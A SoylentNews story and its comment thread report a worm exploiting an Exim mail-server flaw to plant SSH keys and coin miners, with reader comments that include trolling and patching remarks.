SoylentNews is people
SoylentNews
from the post-fix-you-will-be-running-PostFix dept.
A flaw in versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) on Linux systems is being actively exploited in the wild. Exim version 4.92 is not vulnerable.
Specifically under attack is a flaw in Exim-based mail servers, which run almost 57 percent of the internet's email servers. Attackers are exploiting the flaw, discovered last week, to take control of the victim machines, search the internet for other machines to infect, and to initiate a cryptominer infection.
The vulnerability being exploited is an input validation failure on the recipient address on an incoming message.
An initial attack was detected by researcher Freddie Leeman on June 9th.
The more recent and sophisticated campaign first installs an RSA private authentication key on the vulnerable SSH server for root authentication. Once remote command-execution is established, the attacker then deploys a port scanner, to sniff out other vulnerable servers and installs a coin-miner.
In addition, the campaign appears to be "highly pervasive" with extra measures – such as installing several payloads at different stages including the port scanner and coin-miner – for persistence on the infected system.
It is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm," researchers said. "They used hidden services on the TOR network to host their payloads and created deceiving windows ivulnerable exim serverscon files [which is actually a password protected zip archive containing the coin miner executable] in an attempt to throw off researchers and even system administrators who are looking at their logs."
The attack is still being researched and users of vulnerable versions of Exim are being urged to patch their systems.
Related
400,000 Servers Using Exim May be at Risk of Serious Code-Execution Attacks
(Score: 0, Redundant) by realDonaldTrump on Saturday June 15 2019, @07:28AM (4 children)
They ran this one on Monday. Called, "New RCE Vulnerability Impacts Nearly Half of the Internet's EMAIL Servers." Does anyone remember? Possibly I'm the only one that remembers (I never forget). And it truely bares repeating. Very smart to keep repeating this one. Because so many folks got the "cheapest" EMAILS servers they could possibly find -- instead of the "best." Now they're paying the true price, and it's a very heavy one, believe me. Lot of suffering there for the folks that didn't go with Microsoft. Time to pony up and END THE SUFFERING. Thank you RandomFactor and, thank you Editor chromas for the beautiful reminder!!!!
(Score: -1, Troll) by Anonymous Coward on Saturday June 15 2019, @09:39AM (1 child)
I'd like to believe you, but so many things you say aren't true. Perhaps you should've posted the link instead of the title. /s
(Score: -1, Flamebait) by realDonaldTrump on Saturday June 15 2019, @10:47AM
Crooked H, is that you calling me a Lier? If it's you, possibly you're EMAILS is fine. Because you used to have a Microsoft EMAILS "server." And I assume you stuck with Microsoft Cyber. Their customers are very loyal because their product is the best on the market. As everyone knows.
I'll tell you, Soylent News is known as the Home of Links to Nowhere. You try to Tweet a Link, you think it's O.K., sorry it's not. And even the Editors don't know how to make a Link. That's O.K. That's O.K. You don't have to believe me. And, you don't have to believe the story from Random Factor that says EXACTLY the same thing. Just keep doing what you're doing. Keep believeing what you believe. And if you're doing the Exim "server" you may start to see many dirty pictures, and all kinds of "funny" squiggles in your EMAILS. The very special writing of the Chinese, the Korean and even Russian Hackers. Enjoy!!!
(Score: 2, Informative) by RandomFactor on Saturday June 15 2019, @01:51PM (1 child)
nice catch [soylentnews.org]
Search fail looking for previous coverage.
I would go with 'Update' in this case as the previous article was around the initial report of the vulnerability existing, this one is reporting on an active worm now circulating.
The bright side is the worm is apparently not currently attempting to destroy data, just hide and burn CPU cycles for profit.
В «Правде» нет известий, в «Известиях» нет правды
(Score: 0) by Anonymous Coward on Saturday June 15 2019, @04:11PM
The downside is that its taken them so long to notice the active exploit...I'd noticed weird goings on appearing in the exim main log (as opposed to the usual stuff in the error log) last month and hacked together some crude code to block the persistent miscreants at the firewall...I 'd have modified the Exim code directly to do the same but, well, you know......